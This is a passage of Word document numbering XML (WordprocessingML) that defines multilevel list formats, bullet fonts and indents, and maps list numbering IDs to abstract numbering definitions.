      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="(%4)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="(%5)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="(%6)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2520" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1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5">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:styleLink w:val="1058"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="1058"/>
      <w:isLgl/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="340" w:hanging="340"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="16">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7">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18">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19">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="720" w:leader="none"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="210"/>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Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600" w:leader="none"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="4320" w:leader="none"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="5040" w:leader="none"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="5760" w:leader="none"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="6480" w:leader="none"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2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2">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:numStyleLink w:val="1057"/>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3">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="1036"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="1039"/>
      <w:isLgl/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="1040"/>
      <w:isLgl/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2520" w:hanging="2160"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="2520"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="24">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2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720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>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7">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28">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2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0">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="833" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1553" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2273" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2993" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3713" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4433" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5153" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5873" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6593" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="31">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32">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="1005"/>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34">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6">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3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9">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="934" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1654" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2374" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3094" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3814" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4534" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5254" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5974" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6694" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="40">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="777" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1497" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2217" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2937" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3657" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4377" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5097" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5817" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6537" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="26">
